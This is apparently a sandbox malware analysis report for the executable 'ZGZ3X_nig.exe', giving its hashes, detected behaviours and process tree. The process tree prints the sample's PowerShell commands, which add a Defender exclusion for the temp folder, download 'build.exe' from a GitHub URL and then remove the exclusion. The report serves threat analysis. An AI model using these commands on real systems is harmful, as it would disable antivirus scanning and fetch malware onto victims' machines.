Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
22/03/2025, 02:51
Behavioral task
behavioral1
Sample
ZGZ3X_nig.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
ZGZ3X_nig.exe
Resource
win10v2004-20250314-en
General
-
Target
ZGZ3X_nig.exe
-
Size
57KB
-
MD5
16edd47bf01716b24958a0b3a3a7bcfb
-
SHA1
8b7972f4190c2ca9d600084611e966fa0f899b98
-
SHA256
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
-
SHA512
9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
-
SSDEEP
768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures
-
pid Process 2764 powershell.exe 2928 powershell.exe -
resource yara_rule behavioral1/memory/2184-0-0x0000000140000000-0x0000000140028000-memory.dmp upx behavioral1/memory/2184-27-0x0000000140000000-0x0000000140028000-memory.dmp upx -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2928 powershell.exe 2672 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2928 powershell.exe 2764 powershell.exe 2672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2184 wrote to memory of 2784 2184 ZGZ3X_nig.exe 31 PID 2184 wrote to memory of 2784 2184 ZGZ3X_nig.exe 31 PID 2184 wrote to memory of 2784 2184 ZGZ3X_nig.exe 31 PID 2784 wrote to memory of 2816 2784 cmd.exe 32 PID 2784 wrote to memory of 2816 2784 cmd.exe 32 PID 2784 wrote to memory of 2816 2784 cmd.exe 32 PID 2816 wrote to memory of 2804 2816 net.exe 33 PID 2816 wrote to memory of 2804 2816 net.exe 33 PID 2816 wrote to memory of 2804 2816 net.exe 33 PID 2784 wrote to memory of 2928 2784 cmd.exe 34 PID 2784 wrote to memory of 2928 2784 cmd.exe 34 PID 2784 wrote to memory of 2928 2784 cmd.exe 34 PID 2784 wrote to memory of 2764 2784 cmd.exe 35 PID 2784 wrote to memory of 2764 2784 cmd.exe 35 PID 2784 wrote to memory of 2764 2784 cmd.exe 35 PID 2784 wrote to memory of 2672 2784 cmd.exe 36 PID 2784 wrote to memory of 2672 2784 cmd.exe 36 PID 2784 wrote to memory of 2672 2784 cmd.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6789.tmp\678A.tmp\678B.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:2804
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c935ef28fdfd394b770d945d7f04d76
SHA129e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56753014d767e2b4a7aab6eb05a978b87
SHA1913a5beb394a3d8944c32b417931a6a94d974cb5
SHA25675162bf1827d9a8fa03f199d6a117f508837661bd1df2209c6b7339520ee9b28
SHA512c8b5bf5151a9b2c5a7537d464e081964075c5f2360ecc2f47af3251949991104ffa2d1b0714bbae0d3139e8bd3835162bdde8d4aca04e53048ec920495595420